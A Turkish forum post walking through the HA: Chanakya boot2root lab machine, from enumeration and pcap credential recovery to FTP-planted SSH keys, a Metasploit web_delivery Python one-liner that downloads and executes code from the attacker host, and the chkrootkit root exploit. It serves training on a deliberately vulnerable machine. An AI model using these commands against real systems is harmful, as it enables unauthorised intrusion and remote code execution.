HA: Chanakya (Boot2Root) Zafiyetli Makine Çözümü //Siber Güvenlik Kulübü

ratio

Kıdemli Üye
6 Tem 2013
2,456
6
Turk
HA: Chanakya Zafiyetli Makine Çözümü



Seviye: Orta Seviye


Görev: Hedef Makineyi Numaralandırmak ve Kök Erişimini Almak.




Makine 9 Kasım 2019’da Hacking Articles tarafından yayınlanmıştır.



Kurulum


Yüklemek için siteyi ziyaret edebilirsiniz.

Bağlantı: https://www.vulnhub.com/entry/ha-chanakya,395/

OVA şeklinde hazır olarak kurabilirsiniz.

Örn: Virtual Machine --> File --> Open --> chanakya

Başlayalım.



Çözüm


Öncelikle ‘netdiscover’ yazarak ağdaki IP’leri listeliyoruz.

Kod:
netdiscover
Daha sonra nmap(network mapping)(ağ haritalandırma) aracı yardımıyla çözeceğimiz makinenin IP’sindeki açık portları listeliyoruz.

Buradaki –p- parametresi aracın bütün portları (65535) taramasını sağlar.

Buradaki –A parametresi ise taramada sürüm, işletim sistemi (OS) tespiti, script taraması ve traceroute belirlenmesini sağlar.

İşletim Sistemi (Operating System (OS))

Script Nedir? (Herhangi bir programlama dilinde yazılmış, uygulama bölümlerinin tüm kodlarını içinde bulunduran hazır kod bloklarına script adı verilir.)

TraceRoute Nedir? (Network TCP/IP içerisinde kullaılan bir sorgulama komutudur. Bu sorgulama komutu ile gönderilen üç paketin hangi ağ geçitlerinden geçtiği takip edilir ve bir paketin uç noktaya hangi yolları izleyerek gittiği görülür.)

Kod:
nmap –p- -A IP_ADRESI
Kod:
nmap –p- -A 192.168.1.44
xPYBZy.png


Burada nmap 3 tane port buldu. 21(FTP) 22(SSH) 80(HTTP)

Öncelikle HTTP portundan başlayarak siteyi birazcık inceliyoruz. Ancak site üzerinde ne kaynak kodlarında, ne yazılarda ne de resimlerde herhangi bir ipucu bulamadık.

Daha sonra sitelerdeki dizinleri kontrol etmeye karar verdik. Bunu dirb(Web içerik tarayıcısı) isimli araç ile kaba kuvvet saldırısı yaparak sağlayacağız. Dirb, bizim ona vereceğiniz link sözlük bazlı olarak tarayarak bütün içerikleri, linkleri vb. çıkarıp bize listeleyen bir araçtır.

Burada –X parametresi belirlenen uzantılara her türlü kelimenin eklenmesini sağlar.

Kod:
dirb [URL="http://192.168.1.10/"]http://192.168.1.44/[/URL] -X .txt
Daha sonra abuse.txt isimli bir dosya buluyor.

Kod:
wget [URL]http://192.168.1.44/abuse.txt[/URL]
(wget internetten komut satırı ile dosya indirmeyi sağlana indirme yöneticisidir.)

Yukarıdaki komut ile dosyayı indiriyoruz.

cat komutu ile de okuyoruz.

Kod:
cat abuse.txt
Çıktı: nfubxn.cpncat

Anlamlı bir ifade bulamadık. Bu yüzden bunun bir şifre olduğunu düşünüyoruz ve decode etmeyi deniyoruz.

twxDgp.png


İnternette birazcık “nfubxn.cpncatcryptography” olarak aradıktan sonra şifrelemenin ROT13 türünde olduğunu gördük ve decode ettik.
KGMX0x.png


rdJD3J.png


Çıktı: ashoka.pcapng

Daha sonra bunun bir WireShark dosyası olduğunu anladık. Wget ile dosyayı indirdik ve wireshark ile dosyayı açtık.

Kod:
wget [URL]http://192.168.1.44/ashoka.pcapng[/URL]
Kod:
wireshark ashoka.pcapng
wVRRBV.png


Tcp akışını aşağıdaki kod ile filtrelediğimizde kullanıcı adı ve şifreyi elde ediyoruz.

Tcp.stream

User: ashoka

Pass: kautilya

Daha sonra ftp sunucusuna giriş yapıyoruz.

Kod:
ftp 192.168.1.44
Elde ettiğimiz kullanıcı adı ve şifreyi giriyoruz.

Kod:
ashoka
Kod:
kautilya
Daha sonra sunucu da ki dosyaları detaylı şekilde listeliyoruz.

‘.ssh’ dosyasının olmadığını görüyoruz ve ‘.ssh’ dosyasını biz oluşturuyoruz.

K0jnAP.png


Daha sonra ssh-keygen diyerek key’imizi oluşturuyoruz.

Kod:
ssh-keygen
Koyacağınız parola herhangi bir şey olabilir. Ör.: ‘tht’ koyalım.

Kod:
cd .ssh
Kod:
ls
Daha sonra .ssh dizinini listeliyoruz ve id_rsa.pub’ı görüyoruz. Oluşturduğumuz anahtarları authorized_keys’e aktarıyoruz.

Kod:
cat id_rsa.pub > authorized_keys
Kod:
ls
tEnSbO.png


Daha sonra tekrar ftp sunucusuna bağlanıp, oluşturduğumuz anahtarları yüklüyoruz.

Kod:
ftp 192.168.1.44
Kod:
ashoka
Kod:
kautilya
Kod:
put authorized_keys
Kod:
ls


eBrXwo.png


Not: Resimde kök dizine yüklemişiz. Normalde ‘.ssh’ dizinine yüklememiz gerekir aksi halde çalışmayacaktır. Ayrıca ‘.ssh’ dizinine kolayca yüklemek için ‘authorized_keys’i /root/ dizinine taşıyabilirsiniz. Sonra ftp sunucusunda ‘.ssh’ dizinine gelip ‘put authorized_keys’ diyerek yükleme işlemini gerçekleştirebilirsiniz.

Şimdi makineye yüklediğimiz ssh’ları kullanarak ashoka olarak giriş yapabileceğiz.

Sahip olduğumuz kabuk ile makinanın içerisinde biraz dolaşıyoruz ve ‘tmp’ dizininde log dosyası olduğunu fark ediyoruz.

Kod:
ls /tmp
Kod:
cat /tmp/logs
W2NYmA.png


Loglarıinecelediğimizde bunun bir Chkrootkit Test çıktısı olduğunu anlıyoruz.

Rootkit Nedir? (Rootkit yazılımları, saldırganların ele geçirdikleri sisteme daha sonra erişim sağlayabilmelerine imkân sunan zararlı yazılımlardır.)

Chkrootkit nedir? (Bu tür rootkit yazılımlarının sistemdeki varlığını kontrol eden rootkit tespit yazılımları bulunmaktadır. Bunlardan bir tanesi de Chkrootkit’dir.)

Artık yetki edinmemiz gerekiyor ve bunu métasploit de web_delivery modülünü kullanarak yapacağız.

web_delivery nedir? (MSF web_delivery istismar modülü, web sunucusu (Kali) üzerinden kurban sistemlere payload göndermek için kullanılır. Bu modül, kurban sistemlerde çalıştırılan bir komut ile web suncusunda kayıtlı olan zararlı yazılım çağırılarak çalıştırılması için kullanılır. Kurban işletim sisteminde kurumlarda ve son kullanıcı bilgisayarlarında en çok kullanılan anti-virüslerden biri yüklü olmasına rağmen Meterpreter bağlantısının elde edilebildiği görülecektir.)

Métasploit’i açıyoruz.

Kod:
msfconsole
Kullacanağımızexploiti ve modülü seçiyoruz.

Kod:
use exploit/multi/script/web_delivery
Kendi makinemizin IP adresini düzenliyoruz.

Kod:
set lhost 192.168.1.47
Ve çalıştırıyoruz.

Kod:
exploit
Burada bizlere yukarıda da açıkladığımız gibi çalıştırmamız gereken komutu da veriyor.

Örn:
Kod:
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.1.47:8080/bFQwW5lqU95K98j', context=ssl._create_unverified_context());exec(r.read());"

Komutu çalıştırıyoruz.

yGO6VF.png


Oturumumuz da geldi.

q0STaN.png


Oturumumuzu aldıktan sonra makinede root kabuğunu almak için farklı bir exploit kullanıyoruz.

Kod:
use exploit/unix/local/chkrootkit
Aşağıdaki gibi düzenliyoruz.

Kod:
set session 1
Kod:
set lport 8888
Çalıştırıyoruz.

Kod:
exploit
W3DUkw.png


Daha sonra ls diyerek listeliyoruz ve final.txt’yi görüyoruz. Final.txt’yi okuyarak makine çözümünü sonlandırıyoruz.

Kod:
ls
Kod:
cat final.txt
NrVmvC.png




Umarım beğenmişsinizdir. Bence güzel bir zafiyetli makineydi. Teşekkürler.
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.